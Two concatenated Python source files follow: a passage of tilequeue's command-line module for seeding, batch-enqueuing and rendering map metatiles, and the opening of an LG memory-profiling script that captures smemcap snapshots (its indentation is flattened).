    from tilequeue.rawr import make_rawr_enqueuer_from_cfg
    from tilequeue.rawr import RawrAllIntersector
    from tilequeue.stats import RawrTileEnqueueStatsHandler
    logger = make_logger(cfg, 'rawr_seed')
    # intersect with "everything": seeding must not filter by the TOI
    enqueuer = make_rawr_enqueuer_from_cfg(
        cfg, logger, RawrTileEnqueueStatsHandler(peripherals.stats),
        peripherals.msg_marshaller, RawrAllIntersector())
    enqueuer(coords)
    logger.info('%d coords enqueued', len(coords))
def tilequeue_rawr_seed_toi(cfg, peripherals):
    """command to read the toi and enqueue the corresponding rawr tiles"""
    toi = peripherals.toi.fetch_tiles_of_interest()
    unmarshalled = [coord_unmarshall_int(coord_int) for coord_int in toi]
    _tilequeue_rawr_seed(cfg, peripherals, unmarshalled)
def tilequeue_rawr_seed_all(cfg, peripherals):
    """command to enqueue all the tiles at the group-by zoom"""
    rawr_yaml = cfg.yml.get('rawr')
    assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
    group_by_zoom = rawr_yaml.get('group-zoom')
    assert group_by_zoom is not None, 'Missing group-zoom rawr config'
    dim = 2 ** group_by_zoom
    # creating the list of all coordinates here might be a lot of memory, but
    # if we handle the TOI okay then we should be okay with z10. if the group
    # by zoom is much larger, then it might start running into problems.
    coords = [
        Coordinate(zoom=group_by_zoom, column=x, row=y)
        for x in xrange(0, dim)
        for y in xrange(0, dim)
    ]
    _tilequeue_rawr_seed(cfg, peripherals, coords)
# Bundle of shared service handles (TOI store, stats client, redis, queue
# plumbing) that is threaded through most of the tilequeue commands.
Peripherals = namedtuple(
    'Peripherals',
    'toi stats redis_client '
    'queue_mapper msg_marshaller inflight_mgr queue_writer'
)
def make_statsd_client_from_cfg(cfg):
    """Return a statsd client, or a no-op stand-in when unconfigured."""
    if not cfg.statsd_host:
        return FakeStatsd()
    # import lazily so statsd is only required when actually configured
    import statsd
    return statsd.StatsClient(cfg.statsd_host, cfg.statsd_port,
                              prefix=cfg.statsd_prefix)
def tilequeue_batch_enqueue(cfg, args):
    """Submit one AWS Batch job per coordinate to be rendered.

    Coordinates come from one of, in priority order: a file of coords
    (``--file``), a single tile (``--tile``), the z0-7 pyramid
    (``--pyramid``), or by default every tile at the configured batch
    queue-zoom.
    """
    logger = make_logger(cfg, 'batch_enqueue')
    import boto3
    region_name = os.environ.get('AWS_DEFAULT_REGION', 'us-east-1')
    client = boto3.client('batch', region_name=region_name)
    logger.info('Batch enqueue ...')
    batch_yaml = cfg.yml.get('batch')
    assert batch_yaml, 'Missing batch config'
    queue_zoom = batch_yaml.get('queue-zoom')
    assert queue_zoom, 'Missing batch queue-zoom config'
    job_def = batch_yaml.get('job-definition')
    assert job_def, 'Missing batch job-definition config'
    job_queue = batch_yaml.get('job-queue')
    assert job_queue, 'Missing batch job-queue config'
    job_name_prefix = batch_yaml.get('job-name-prefix')
    assert job_name_prefix, 'Missing batch job-name-prefix config'
    check_metatile_exists = batch_yaml.get('check-metatile-exists')
    retry_attempts = batch_yaml.get('retry-attempts')
    memory = batch_yaml.get('memory')
    vcpus = batch_yaml.get('vcpus')
    run_id = batch_yaml.get('run_id')
    if not run_id:
        run_id = make_default_run_id(include_clock_time=True)
    if args.file:
        with open(args.file) as coords_fh:
            coords = list(create_coords_generator_from_tiles_file(coords_fh))
    elif args.tile:
        coord = deserialize_coord(args.tile)
        assert coord, 'Invalid coord: %s' % args.tile
        coords = [coord]
    elif args.pyramid:
        coords = tile_generator_for_range(0, 0, 0, 0, 0, 7)
    else:
        dim = 2 ** queue_zoom
        coords = tile_generator_for_range(
            0, 0, dim-1, dim-1, queue_zoom, queue_zoom)
    # count jobs submitted; initialised up front so the final log line
    # works even when there are no coords to enqueue (previously the loop
    # variable was undefined in that case).
    n_jobs = 0
    for coord in coords:
        coord_str = serialize_coord(coord)
        job_name = '%s-%d-%d-%d' % (
            job_name_prefix, coord.zoom, coord.column, coord.row)
        job_parameters = dict(
            tile=coord_str,
            run_id=run_id,
        )
        job_opts = dict(
            jobDefinition=job_def,
            jobQueue=job_queue,
            jobName=job_name,
            parameters=job_parameters,
        )
        if retry_attempts is not None:
            job_opts['retryStrategy'] = dict(attempts=retry_attempts)
        container_overrides = {}
        if check_metatile_exists is not None:
            val_str = str(bool(check_metatile_exists))
            # AWS Batch expects "environment" to be a list of name/value
            # dicts; a stray trailing comma previously made this a 1-tuple.
            container_overrides['environment'] = [dict(
                name='TILEQUEUE__BATCH__CHECK-METATILE-EXISTS',
                value=val_str,
            )]
        if memory:
            container_overrides['memory'] = memory
        if vcpus:
            container_overrides['vcpus'] = vcpus
        if container_overrides:
            job_opts['containerOverrides'] = container_overrides
        resp = client.submit_job(**job_opts)
        # interpolate the actual job name (previously the literal string
        # 'JobName' was formatted into the message).
        assert resp['ResponseMetadata']['HTTPStatusCode'] == 200, \
            'Failed to submit job: %s' % job_name
        n_jobs += 1
        if n_jobs % 1000 == 0:
            logger.info('%d jobs submitted', n_jobs)
    logger.info('Batch enqueue ... done - %d coords enqueued', n_jobs)
def find_job_coords_for(coord, target_zoom):
    """Yield all descendants of ``coord`` at ``target_zoom``.

    If ``coord`` is already at ``target_zoom``, yields just ``coord``
    itself. Otherwise yields every coordinate in the axis-aligned block
    of children that ``coord`` covers at the target zoom.
    """
    assert target_zoom >= coord.zoom
    if coord.zoom == target_zoom:
        yield coord
        return
    # each zoom level doubles the tile coordinates: the children of tile
    # (x, y) at zoom z span columns [2x, 2x+1] at zoom z+1, so after
    # `zoom_diff` levels the block spans [x << d, ((x+1) << d) - 1].
    zoom_diff = target_zoom - coord.zoom
    xmin = coord.column << zoom_diff
    ymin = coord.row << zoom_diff
    xmax = ((coord.column + 1) << zoom_diff) - 1
    ymax = ((coord.row + 1) << zoom_diff) - 1
    for y in xrange(ymin, ymax + 1):
        for x in xrange(xmin, xmax + 1):
            # BUG FIX: the zoom was previously hard-coded to 10, which was
            # only correct when target_zoom happened to be 10. Callers
            # (e.g. tilequeue_meta_tile) pass the configured group-by zoom.
            yield Coordinate(zoom=target_zoom, column=x, row=y)
def tilequeue_meta_tile(cfg, args):
    """Render and store the full metatile pyramid under one coordinate.

    The coordinate (``args.tile``) must lie between the batch queue-zoom
    and the RAWR group-by zoom. For each job coordinate at the group-by
    zoom underneath it, the entire pyramid of tiles down to
    ``cfg.max_zoom`` is fetched, processed, packed into metatiles and
    written to the store. Failures are logged per pyramid / per tile and
    processing continues with the next unit of work.
    """
    from tilequeue.log import JsonMetaTileLogger
    from tilequeue.metatile import make_metatiles
    coord_str = args.tile
    run_id = args.run_id
    if not run_id:
        run_id = make_default_run_id(include_clock_time=False)
    logger = make_logger(cfg, 'meta_tile')
    meta_tile_logger = JsonMetaTileLogger(logger, run_id)
    store = \
        _make_store(cfg,
                    s3_role_arn=args.s3_role_arn,
                    s3_role_session_duration_s=args.s3_role_session_duration_s,
                    logger=logger)
    batch_yaml = cfg.yml.get('batch')
    assert batch_yaml, 'Missing batch config'
    queue_zoom = batch_yaml.get('queue-zoom')
    assert queue_zoom, 'Missing batch queue-zoom config'
    check_metatile_exists = bool(batch_yaml.get('check-metatile-exists'))
    parent = deserialize_coord(coord_str)
    assert parent, 'Invalid coordinate: %s' % coord_str
    with open(cfg.query_cfg) as query_cfg_fp:
        query_cfg = yaml.load(query_cfg_fp)
    all_layer_data, layer_data, post_process_data = (
        parse_layer_data(
            query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
    output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
    # one I/O thread per layer so layer fetches can run in parallel
    io_pool = ThreadPool(len(layer_data))
    data_fetcher = make_data_fetcher(cfg,
                                     layer_data,
                                     query_cfg,
                                     io_pool,
                                     args.s3_role_arn,
                                     args.s3_role_session_duration_s)
    rawr_yaml = cfg.yml.get('rawr')
    assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
    group_by_zoom = rawr_yaml.get('group-zoom')
    assert group_by_zoom is not None, 'Missing group-zoom rawr config'
    assert queue_zoom <= parent.zoom <= group_by_zoom, \
        'Unexpected zoom: %s, zoom should be between %d and %d' % \
        (coord_str, queue_zoom, group_by_zoom)
    # NOTE: max_zoom looks to be inclusive
    zoom_stop = cfg.max_zoom
    assert zoom_stop > group_by_zoom
    formats = lookup_formats(cfg.output_formats)
    meta_tile_logger.begin_run(parent)
    zip_format = lookup_format_by_extension('zip')
    assert zip_format
    # one "job coordinate" per group-by-zoom descendant of the parent
    job_coords = find_job_coords_for(parent, group_by_zoom)
    for job_coord in job_coords:
        meta_tile_logger.begin_pyramid(parent, job_coord)
        # each coord here is the unit of work now
        pyramid_coords = [job_coord]
        pyramid_coords.extend(coord_children_range(job_coord, zoom_stop))
        coord_data = [dict(coord=x) for x in pyramid_coords]
        try:
            fetched_coord_data = list(data_fetcher.fetch_tiles(coord_data))
        except Exception as e:
            # a fetch failure aborts the whole pyramid, not just one tile
            meta_tile_logger.pyramid_fetch_failed(e, parent, job_coord)
            continue
        for fetch, coord_datum in fetched_coord_data:
            coord = coord_datum['coord']
            if check_metatile_exists:
                # skip tiles that already have stored output
                existing_data = store.read_tile(coord, zip_format)
                if existing_data is not None:
                    meta_tile_logger.metatile_already_exists(
                        parent, job_coord, coord)
                    continue

            # NOTE(review): log_fn closes over the loop variables
            # (job_coord, coord); it is only used within this iteration via
            # Processor, so the late-binding capture appears safe here —
            # confirm Processor does not retain log_fn across iterations.
            def log_fn(data):
                meta_tile_logger._log(
                    data, parent, pyramid=job_coord, coord=coord)

            processor = Processor(
                coord, cfg.metatile_zoom, fetch, layer_data,
                post_process_data, formats, cfg.buffer_cfg,
                output_calc_mapping, cfg.max_zoom, cfg.tile_sizes,
                log_fn=log_fn)
            try:
                processor.fetch()
            except Exception as e:
                meta_tile_logger.tile_fetch_failed(
                    e, parent, job_coord, coord)
                continue
            try:
                formatted_tiles, _ = processor.process_tiles()
            except Exception as e:
                meta_tile_logger.tile_process_failed(
                    e, parent, job_coord, coord)
                continue
            try:
                tiles = make_metatiles(cfg.metatile_size, formatted_tiles)
                for tile in tiles:
                    store.write_tile(
                        tile['tile'], tile['coord'], tile['format'])
            except Exception as e:
                meta_tile_logger.metatile_storage_failed(
                    e, parent, job_coord, coord)
                continue
            meta_tile_logger.tile_processed(parent, job_coord, coord)
        meta_tile_logger.end_pyramid(parent, job_coord)
    meta_tile_logger.end_run(parent)
def tilequeue_meta_tile_low_zoom(cfg, args):
    """Render and store low-zoom metatiles for a single coordinate.

    Handles tiles from zoom 0 up to, but not including, the RAWR
    group-by zoom. When the input coordinate (``args.tile``) is at the
    batch queue-zoom, the whole pyramid of descendants down to
    group-by-zoom - 1 is processed as well; otherwise only the single
    coordinate is rendered. Failures are logged per tile and processing
    continues.
    """
    from tilequeue.log import JsonMetaTileLowZoomLogger
    from tilequeue.metatile import make_metatiles
    coord_str = args.tile
    parent = deserialize_coord(coord_str)
    assert parent, 'Invalid tile coordinate: %s' % coord_str
    run_id = args.run_id
    if not run_id:
        run_id = make_default_run_id(include_clock_time=False)
    logger = make_logger(cfg, 'meta_tile_low_zoom')
    meta_low_zoom_logger = JsonMetaTileLowZoomLogger(logger, run_id)
    store = _make_store(cfg,
                        s3_role_arn=args.s3_role_arn,
                        s3_role_session_duration_s=args.s3_role_session_duration_s,  # noqa
                        logger=logger)
    batch_yaml = cfg.yml.get('batch')
    assert batch_yaml, 'Missing batch config'
    # NOTE: the queue zoom is the zoom at which jobs will mean that
    # children should be processed as well
    # before then, we will only generate meta tiles for individual tiles
    queue_zoom = batch_yaml.get('queue-zoom')
    assert queue_zoom, 'Missing batch queue-zoom config'
    assert 0 <= parent.zoom <= queue_zoom
    check_metatile_exists = bool(batch_yaml.get('check-metatile-exists'))
    with open(cfg.query_cfg) as query_cfg_fp:
        query_cfg = yaml.load(query_cfg_fp)
    all_layer_data, layer_data, post_process_data = (
        parse_layer_data(
            query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
    output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
    # one I/O thread per layer so layer fetches can run in parallel
    io_pool = ThreadPool(len(layer_data))
    data_fetcher = make_data_fetcher(cfg, layer_data, query_cfg, io_pool)
    rawr_yaml = cfg.yml.get('rawr')
    assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
    # group by zoom is the exclusive stop for tiles if the command
    # line coordinate is queue zoom
    group_by_zoom = rawr_yaml.get('group-zoom')
    assert group_by_zoom is not None, 'Missing group-zoom rawr config'
    assert queue_zoom < group_by_zoom
    formats = lookup_formats(cfg.output_formats)
    zip_format = lookup_format_by_extension('zip')
    assert zip_format
    meta_low_zoom_logger.begin_run(parent)
    coords = [parent]
    # we don't include tiles at group_by_zoom, so unless parent.zoom is
    # _more_ than one zoom level less, we don't need to include the pyramid.
    if parent.zoom == queue_zoom and parent.zoom < group_by_zoom - 1:
        # we will be multiple meta tile coordinates in this run
        coords.extend(coord_children_range(parent, group_by_zoom - 1))
    for coord in coords:
        meta_low_zoom_logger._log("start processing coord",
                                  parent=parent,
                                  coord=coord)
        if check_metatile_exists:
            # skip coords whose metatile already exists in the store
            existing_data = store.read_tile(coord, zip_format)
            if existing_data is not None:
                meta_low_zoom_logger.metatile_already_exists(parent, coord)
                continue
        coord_data = [dict(coord=coord)]
        try:
            fetched_coord_data = list(data_fetcher.fetch_tiles(coord_data))
        except Exception as e:
            # the postgres db fetch doesn't perform the fetch at
            # this step, which would make failures here very
            # surprising
            meta_low_zoom_logger.fetch_failed(e, parent, coord)
            continue
        assert len(fetched_coord_data) == 1
        fetch, coord_datum = fetched_coord_data[0]
        coord = coord_datum['coord']

        # NOTE(review): log_fn captures the current loop `coord` and is
        # used only within this iteration. It also passes `parent` and
        # `coord` positionally, unlike the keyword-argument calls above —
        # confirm against JsonMetaTileLowZoomLogger._log's signature.
        def log_fn(data):
            meta_low_zoom_logger._log(data, parent, coord)

        processor = Processor(
            coord, cfg.metatile_zoom, fetch, layer_data,
            post_process_data, formats, cfg.buffer_cfg,
            output_calc_mapping, cfg.max_zoom, cfg.tile_sizes,
            log_fn=log_fn)
        try:
            processor.fetch()
        except Exception as e:
            meta_low_zoom_logger.fetch_failed(
                e, parent, coord)
            continue
        try:
            formatted_tiles, _ = processor.process_tiles()
        except Exception as e:
            meta_low_zoom_logger.tile_process_failed(
                e, parent, coord)
            continue
        try:
            tiles = make_metatiles(cfg.metatile_size, formatted_tiles)
            meta_low_zoom_logger._log('start writing {n} tiles for coord'.format(n=len(tiles)), parent=parent, coord=coord)  # noqa
            for tile in tiles:
                store.write_tile(tile['tile'], tile['coord'], tile['format'])
        except Exception as e:
            meta_low_zoom_logger.metatile_storage_failed(
                e, parent, coord)
            continue
        meta_low_zoom_logger.tile_processed(parent, coord)
    meta_low_zoom_logger.end_run(parent)
def tilequeue_main(argv_args=None):
    """Command line entry point for tilequeue.

    Builds an argument parser with one sub-command per operation, parses
    ``argv_args`` (defaulting to ``sys.argv[1:]``), loads the config file
    applying any command line overrides, and dispatches to the selected
    command function.
    """
    if argv_args is None:
        argv_args = sys.argv[1:]
    parser = TileArgumentParser()
    subparsers = parser.add_subparsers()

    # these are all the "standard" parsers which just take a config argument
    # that is already included at the top level.
    cfg_commands = (
        ('process', tilequeue_process),
        ('seed', tilequeue_seed),
        ('dump-tiles-of-interest', tilequeue_dump_tiles_of_interest),
        ('load-tiles-of-interest', tilequeue_load_tiles_of_interest),
        ('enqueue-tiles-of-interest', tilequeue_enqueue_tiles_of_interest),
        ('enqueue-stdin', tilequeue_enqueue_stdin),
        ('prune-tiles-of-interest', tilequeue_prune_tiles_of_interest),
        ('wof-process-neighbourhoods', tilequeue_process_wof_neighbourhoods),
        ('wof-load-initial-neighbourhoods',
         tilequeue_initial_load_wof_neighbourhoods),
        ('consume-tile-traffic', tilequeue_consume_tile_traffic),
        ('stuck-tiles', tilequeue_stuck_tiles),
        ('delete-stuck-tiles', tilequeue_delete_stuck_tiles),
        ('rawr-process', tilequeue_rawr_process),
        ('rawr-seed-toi', tilequeue_rawr_seed_toi),
        ('rawr-seed-all', tilequeue_rawr_seed_all),
    )

    def _make_peripherals(cfg):
        # build all the shared services commands need: redis, tile queues,
        # TOI helper, message marshaller, in-flight manager, queue writer
        # and the stats client.
        redis_client = make_redis_client(cfg)
        toi_helper = make_toi_helper(cfg)
        tile_queue_result = make_tile_queue(
            cfg.queue_cfg, cfg.yml, redis_client)
        tile_queue_name_map = {}
        if isinstance(tile_queue_result, tuple):
            tile_queue, queue_name = tile_queue_result
            tile_queue_name_map[queue_name] = tile_queue
        else:
            assert isinstance(tile_queue_result, list), \
                'Unknown tile_queue result: %s' % tile_queue_result
            for tile_queue, queue_name in tile_queue_result:
                tile_queue_name_map[queue_name] = tile_queue
        queue_mapper_yaml = cfg.yml.get('queue-mapping')
        assert queue_mapper_yaml, 'Missing queue-mapping configuration'
        queue_mapper = make_queue_mapper(
            queue_mapper_yaml, tile_queue_name_map, toi_helper)
        msg_marshall_yaml = cfg.yml.get('message-marshall')
        assert msg_marshall_yaml, 'Missing message-marshall config'
        msg_marshaller = make_message_marshaller(msg_marshall_yaml)
        inflight_yaml = cfg.yml.get('in-flight')
        inflight_mgr = make_inflight_manager(inflight_yaml, redis_client)
        enqueue_batch_size = 10
        from tilequeue.queue.writer import QueueWriter
        queue_writer = QueueWriter(
            queue_mapper, msg_marshaller, inflight_mgr, enqueue_batch_size)
        stats = make_statsd_client_from_cfg(cfg)
        peripherals = Peripherals(
            toi_helper, stats, redis_client, queue_mapper, msg_marshaller,
            inflight_mgr, queue_writer
        )
        return peripherals

    def _make_peripherals_command(func):
        # wrap a (cfg, peripherals) command so it can be dispatched with
        # the standard (cfg, args) signature.
        def command_fn(cfg, args):
            peripherals = _make_peripherals(cfg)
            return func(cfg, peripherals)
        return command_fn

    def _make_peripherals_with_args_command(func):
        # as above, but also forwards the parsed args to the command.
        def command_fn(cfg, args):
            peripherals = _make_peripherals(cfg)
            return func(cfg, peripherals, args)
        return command_fn

    for parser_name, func in cfg_commands:
        subparser = subparsers.add_parser(parser_name)
        # config parameter is shared amongst all parsers, but appears here so
        # that it can be given _after_ the name of the command.
        subparser.add_argument('--config', required=True,
                               help='The path to the tilequeue config file.')
        command_fn = _make_peripherals_command(func)
        subparser.set_defaults(func=command_fn)

    # add "special" commands which take arguments
    subparser = subparsers.add_parser('tile-status')
    subparser.add_argument('--config', required=True,
                           help='The path to the tilequeue config file.')
    subparser.add_argument('coords', nargs='*',
                           help='Tile coordinates as "z/x/y".')
    subparser.set_defaults(
        func=_make_peripherals_with_args_command(tilequeue_tile_status))

    subparser = subparsers.add_parser('tile')
    subparser.add_argument('--config', required=True,
                           help='The path to the tilequeue config file.')
    subparser.add_argument('coord',
                           help='Tile coordinate as "z/x/y".')
    subparser.set_defaults(
        func=_make_peripherals_with_args_command(tilequeue_process_tile))

    subparser = subparsers.add_parser('enqueue-tiles-of-interest-pyramids')
    subparser.add_argument('--config', required=True,
                           help='The path to the tilequeue config file.')
    subparser.add_argument('--zoom-start', type=int, required=False,
                           default=None, help='Zoom start')
    subparser.add_argument('--zoom-stop', type=int, required=False,
                           default=None, help='Zoom stop, exclusive')
    subparser.set_defaults(
        func=_make_peripherals_with_args_command(
            tilequeue_enqueue_full_pyramid_from_toi))

    subparser = subparsers.add_parser('enqueue-random-pyramids')
    subparser.add_argument('--config', required=True,
                           help='The path to the tilequeue config file.')
    subparser.add_argument('--zoom-start', type=int, required=False,
                           default=None, help='Zoom start')
    subparser.add_argument('--zoom-stop', type=int, required=False,
                           default=None, help='Zoom stop, exclusive')
    subparser.add_argument('gridsize', type=int, help='Dimension of grid size')
    subparser.add_argument('n-samples', type=int,
                           help='Number of total samples')
    subparser.set_defaults(
        func=_make_peripherals_with_args_command(
            tilequeue_enqueue_random_pyramids))

    subparser = subparsers.add_parser('rawr-enqueue')
    subparser.add_argument('--config', required=True,
                           help='The path to the tilequeue config file.')
    subparser.add_argument('--expiry-path', required=True,
                           help='path to tile expiry file')
    subparser.set_defaults(func=tilequeue_rawr_enqueue)

    subparser = subparsers.add_parser('meta-tile')
    subparser.add_argument('--config', required=True,
                           help='The path to the tilequeue config file.')
    subparser.add_argument('--tile', required=True,
                           help='Tile coordinate as "z/x/y".')
    subparser.add_argument('--run_id', required=False,
                           help='optional run_id used for logging')
    subparser.add_argument('--postgresql_hosts', required=False,
                           help='optional string of a list of db hosts e.g. '
                                '`["aws.rds.url", "localhost"]`')
    subparser.add_argument('--postgresql_dbnames', required=False,
                           help='optional string of a list of db names e.g. '
                                '`["gis"]`')
    subparser.add_argument('--postgresql_user', required=False,
                           help='optional string of db user e.g. `gisuser`')
    subparser.add_argument('--postgresql_password', required=False,
                           help='optional string of db password e.g. '
                                '`VHcDuAS0SYx2tlgTvtbuCXwlvO4pAtiGCuScJFjq7wersdfqwer`')  # noqa
    subparser.add_argument('--store_name', required=False,
                           help='optional string of a list of tile store '
                                'names e.g. `["my-meta-tiles-us-east-1"]`')
    subparser.add_argument('--store_date_prefix', required=False,
                           help='optional string of store bucket date prefix '
                                'e.g. `20210426`')
    subparser.add_argument('--batch_check_metafile_exists', required=False,
                           help='optional string of a boolean indicating '
                                'whether to check metafile exists or not '
                                'e.g. `false`')
    subparser.add_argument('--s3_role_arn', required=False,
                           help='optional string of the S3 access role ARN'
                                'e.g. `arn:aws:iam::1234:role/DataAccess-tilebuild`')  # noqa
    subparser.add_argument('--s3_role_session_duration_s', required=False,
                           type=int,
                           help='optional integer which indicates the number '
                                'of seconds for the S3 session using the '
                                'provided s3_role_arn'
                                'e.g. `3600`')
    subparser.set_defaults(func=tilequeue_meta_tile)

    subparser = subparsers.add_parser('meta-tile-low-zoom')
    subparser.add_argument('--config', required=True,
                           help='The path to the tilequeue config file.')
    subparser.add_argument('--tile', required=True,
                           help='Tile coordinate as "z/x/y".')
    subparser.add_argument('--run_id', required=False,
                           help='optional run_id used for logging')
    subparser.add_argument('--postgresql_hosts', required=False,
                           help='optional string of a list of db hosts e.g. `["aws.rds.url", "localhost"]`')  # noqa
    subparser.add_argument('--postgresql_dbnames', required=False,
                           help='optional string of a list of db names e.g. `["gis"]`')  # noqa
    subparser.add_argument('--postgresql_user', required=False,
                           help='optional string of db user e.g. `gisuser`')
    subparser.add_argument('--postgresql_password', required=False,
                           help='optional string of db password e.g. `VHcDuAS0SYx2tlgTvtbuCXwlvO4pAtiGCuScJFjq7wersdfqwer`')  # noqa
    subparser.add_argument('--store_name', required=False,
                           help='optional string of a list of tile store names e.g. `["my-meta-tiles-us-east-1"]`')  # noqa
    subparser.add_argument('--store_date_prefix', required=False,
                           help='optional string of store bucket date prefix e.g. `20210426`')  # noqa
    subparser.add_argument('--batch_check_metafile_exists', required=False,
                           help='optional string of a boolean indicating whether to check metafile exists or not e.g. `false`')  # noqa
    subparser.add_argument('--s3_role_arn', required=False,
                           help='optional string of the S3 access role ARN'
                                'e.g. '
                                '`arn:aws:iam::1234:role/DataAccess-tilebuild`')  # noqa
    subparser.add_argument('--s3_role_session_duration_s', required=False,
                           type=int,
                           help='optional integer which indicates the number '
                                'of seconds for the S3 session using the '
                                'provided s3_role_arn'
                                'e.g. `3600`')
    subparser.set_defaults(func=tilequeue_meta_tile_low_zoom)

    subparser = subparsers.add_parser('rawr-tile')
    subparser.add_argument('--config', required=True,
                           help='The path to the tilequeue config file.')
    subparser.add_argument('--tile', required=True,
                           help='Tile coordinate as "z/x/y".')
    subparser.add_argument('--run_id', required=False,
                           help='optional run_id used for logging')
    subparser.add_argument('--postgresql_hosts', required=False,
                           help='optional string of a list of db hosts e.g. '
                                '`["aws.rds.url", "localhost"]`')
    subparser.add_argument('--postgresql_dbnames', required=False,
                           help='optional string of a list of db names e.g. '
                                '`["gis"]`')
    subparser.add_argument('--postgresql_user', required=False,
                           help='optional string of db user e.g. `gisuser`')
    subparser.add_argument('--postgresql_password', required=False,
                           help='optional string of db password e.g. '
                                '`VHcDuAS0SYx2tlgTvtbuCXwlvO4pAtiGCuScJFjq7wersdfqwer`')  # noqa
    subparser.add_argument('--store_name', required=False,
                           help='optional string of a list of tile store '
                                'names e.g. `["my-meta-tiles-us-east-1"]`')
    subparser.add_argument('--store_date_prefix', required=False,
                           help='optional string of store bucket date prefix '
                                'e.g. `20210426`')
    subparser.add_argument('--batch_check_metafile_exists', required=False,
                           help='optional string of a boolean indicating '
                                'whether to check metafile exists or not '
                                'e.g. `false`')
    subparser.add_argument('--s3_role_arn', required=False,
                           help='optional string of the S3 access role ARN'
                                'e.g. '
                                '`arn:aws:iam::1234:role/DataAccess-tilebuild`')  # noqa
    subparser.add_argument('--s3_role_session_duration_s', required=False,
                           type=int,
                           help='optional integer which indicates the number '
                                'of seconds for the S3 session using the '
                                'provided s3_role_arn'
                                'e.g. `3600`')
    subparser.set_defaults(func=tilequeue_rawr_tile)

    subparser = subparsers.add_parser('batch-enqueue')
    subparser.add_argument('--config', required=True,
                           help='The path to the tilequeue config file.')
    subparser.add_argument('--file', required=False,
                           help='Path to file containing coords to enqueue')
    subparser.add_argument('--tile', required=False,
                           help='Single coordinate to enqueue')
    # NOTE(review): argparse's type=bool treats any non-empty string as
    # True (e.g. `--pyramid false` is truthy); kept as-is for CLI
    # compatibility, but consider action='store_true' in a future release.
    subparser.add_argument('--pyramid', type=bool, required=False,
                           help='Enqueue all coordinates below queue zoom')
    subparser.set_defaults(func=tilequeue_batch_enqueue)

    args = parser.parse_args(argv_args)
    assert os.path.exists(args.config), \
        'Config file {} does not exist!'.format(args.config)
    # BUG FIX: not every sub-command defines the optional override
    # arguments below (e.g. 'process' and 'seed' parsers only take
    # --config), so read them defensively with getattr instead of direct
    # attribute access, which raised AttributeError for those commands.
    s3_role_arn = getattr(args, 's3_role_arn', None)
    s3_role_session_duration_s = getattr(
        args, 's3_role_session_duration_s', None)
    if s3_role_arn:
        assert s3_role_arn.strip(), 's3_role_arn is invalid'
        assert s3_role_session_duration_s, \
            's3_role_arn is provided but s3_role_session_duration_s is not'
        assert s3_role_session_duration_s > 0, \
            's3_role_session_duration_s is non-positive'
    with open(args.config) as fh:
        cfg = make_config_from_argparse(
            fh,
            postgresql_hosts=getattr(args, 'postgresql_hosts', None),
            postgresql_dbnames=getattr(args, 'postgresql_dbnames', None),
            postgresql_user=getattr(args, 'postgresql_user', None),
            postgresql_password=getattr(args, 'postgresql_password', None),
            store_name=getattr(args, 'store_name', None),
            store_date_prefix=getattr(args, 'store_date_prefix', None),
            batch_check_metafile_exists=getattr(
                args, 'batch_check_metafile_exists', None))
    args.func(cfg, args)
|
mem_profile.py | #!/usr/bin/python
# Copyright (c) 2018 LG Electronics, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
from plat_info import PlatInfoFactory
from commander import CommanderFactory
import os, sys, json, collections, argparse, datetime, subprocess
class MemoryProfiler(object):
DFT_SNAPSHOT_EXT = '.tar.gz'
SEPARATORS = (',', ': ')
def __init__(self, folder_to_analyze, perf_type, perf_group, perf_value):
'''
Class that analyzes a folder and generates APS output
from multiple memory snapshots
@param folder_to_analyze Folder containing the testcases data
@param PerfType string to appear in perfmeta.json
@param PerfGroup string to appear in perfmeta.json
@param PerfValue string to appear in perfmeta.json
'''
self._folder = folder_to_analyze
self._pt = perf_type
self._pg = perf_group
self._pv = perf_value
print 'folder(%s) pt(%s) pg(%s) pv(%s)' \
% (self._folder, self._pt, self._pg, self._pv)
self._snapshot_exts = (MemoryProfiler.DFT_SNAPSHOT_EXT, '.tgz', '.tar', '.gz')
# List of tuples with testcase information and memory map
self._aps_lst = []
# List of aps files generated
self._aps_files = []
# Dict containing information about all test cases
self._all_tc_map = collections.OrderedDict()
@staticmethod
def capture_snapshot(comm, base_folder, test_case, scenario):
'''
Capture a memory snapshot and put it under specific folder structure
and file name as:
<base_folder>/<test_case>/<timestamp>_<scenario>.tar.gz
@param base_folder Folder containing a subfolder for each test case
@param test_case Folder containing snapshots captured for test case
@param scenario Name indicating scenario when snapshot was captured
@return String that will be passed to sys.exit() and be printed,
otherwise os.EX_OK indicating success
'''
base_utils = ('smemcap', 'gzip')
for u in base_utils:
try:
out = comm.exec_command(['which', u, '>', '/dev/null', '2>&1'], shell=True)
except subprocess.CalledProcessError as e:
if e.returncode != 255:
return 'Error %d: %s is not in PATH environment variable' \
% (e.returncode, u)
raise e
full_path = os.path.join(base_folder, test_case)
try:
os.makedirs(full_path)
except OSError as e:
if e.errno == 17:
# Folder already exists
pass
else:
# Failed to create folder
return 'Exception: ' + str(e)
cmd = ['mount', '-t', 'debugfs', 'none', '/sys/kernel/debug', '>', '/dev/null', '2>&1']
try:
comm.exec_command(cmd, shell=True)
except subprocess.CalledProcessError as e:
# Ignore error code 32 meaning it's already mounted
if e.returncode != 32:
return 'Error %d: Failed to mount debugfs with command %r' \
% (e.returncode, " ".join(cmd))
ts = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
file_name = ts + '_' + scenario + MemoryProfiler.DFT_SNAPSHOT_EXT
dest_file = os.path.join(full_path, file_name)
cmd = [base_utils[0], '|', base_utils[1], '-']
try:
out = comm.exec_command(cmd, shell=True)
except subprocess.CalledProcessError as e:
if e.returncode != 255:
return 'Error %d: Failed to create snapshot: %r' \
% (e.returncode, cmd)
raise e
with open(dest_file, 'w') as f:
f.write(out)
print 'Created snapshot: %s' % dest_file
